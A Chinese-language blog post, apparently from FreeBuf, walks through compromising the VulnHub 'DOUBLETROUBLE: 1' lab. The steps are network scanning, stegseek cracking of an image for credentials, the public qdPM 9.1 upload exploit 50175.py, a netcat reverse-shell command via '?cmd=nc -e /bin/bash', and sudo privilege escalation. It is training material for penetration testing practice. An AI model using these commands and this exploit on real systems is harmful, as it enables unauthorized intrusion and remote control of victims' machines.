freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻防一练(DOUBLETROUBLE: 1)
2024-01-30 20:09:33

靶场下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/

配置靶场

开启靶场进入此界面 按E进入

1706616049_65b8e4f166299191d75c1.png!small

按E进入

1706616057_65b8e4f923d788a20c1c7.png!small

将ro改为rw signie init=/bin/bash

1706616062_65b8e4feb319d38b5f23a.png!small

Ctrl + x 进入

直接输入命令  nano  /etc/network/interfaces

1706616068_65b8e504995d18ce8761d.png!small

将这两处修改为ens33

然后ctrl + o 再回车 再ctrl + x

1706616075_65b8e50b1dde4de2260f0.png!small

/etc/init.d/networking restart  重新启动

Ifconfig 查看本机ip

1706616087_65b8e51766d1f65bbceb6.png!small

nmap -sP 192.168.78.0/24  扫描靶机ip

1706616096_65b8e520116f24f6f3041.png!small

nmap -p- -sS -sV -A 192.168.78.134 扫描开放端口及其他信息

1706616103_65b8e527960f258803b2b.png!small

访问80端口

1706616115_65b8e53368801b06fec95.png!small

进行弱口令,注入都没有得到结果,发现qdPM,版本9.1。

dirsearch -u http://192.168.78.134

扫描目录

1706616125_65b8e53d8e197d51e8bbd.png!small

访问一下所有目录

发现其中secret/

1706616130_65b8e542d8688c9e93997.png!small

查看jpg图片

1706616136_65b8e548a7cd03ae5f9d2.png!small

把图片下载到桌面wget http://192.168.78.134/secret/doubletrouble.jpg

1706616141_65b8e54d579db6f1ef701.png!small

对图片进行爆破看看有没有隐藏信息

先下载stegseek

1706616146_65b8e55255ccbdeb5388b.png!small

更新一下数据包

1706616152_65b8e558432702c2ff31c.png!small

先查看图片是否有隐藏信息

apt-get install steghide

1706616157_65b8e55dbe6c1fde385d8.png!small

发现需要密码,爆破一下

先安装stegseek

1706616164_65b8e56443eea2ca19e4c.png!small

爆破

stegseek doublerouble.jpg /usr/share/wordlists/rockyou.txt

1706616168_65b8e56837306d180151b.png!small

得到一个文件在桌面

1706616173_65b8e56d2fc9366c45d0c.png!small

得到一组账号密码

otisrush@localhost.com

otis666

Poc反弹shell

搜索qdPM 9.1

searchsploit qdPM 9.1

1706616180_65b8e574e29a2a0aab910.png!small

这里使用50175.py

下载 50175.py 到桌面

searchsploit -m 50175.py

python3 50175.py -url http://192.168.78.134/ -u otisrush@localhost.com -p otis666 上传它

1706616203_65b8e58b2e155169c7277.png!small

1706616213_65b8e595e7f51778931a1.png!small

可以控制命令反弹shell

开启一个监听

1706616222_65b8e59e31d430bebebf4.png!small

在浏览器后面输入?cmd=nc -e /bin/bash ip 1234 回车

1706616226_65b8e5a2a35771c46c730.png!small

反弹成功

第二种方式

1706616231_65b8e5a7e047241cd1302.png!small

上传文件即可

1706616236_65b8e5ac6952a4a3f8625.png!small

开启监听1234

点击反弹

1706616242_65b8e5b2defffd39e4a48.png!small

发现登录成功

提权直接sudo -l

发现有可执行的root权限的命令,直接搜索提权

生成php文件网址

https://www.revshells.com/

Sudo - l提权网站

https://gtfobins.github.io/#

# 渗透测试 # 网络安全 # web安全 # 漏洞分析
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者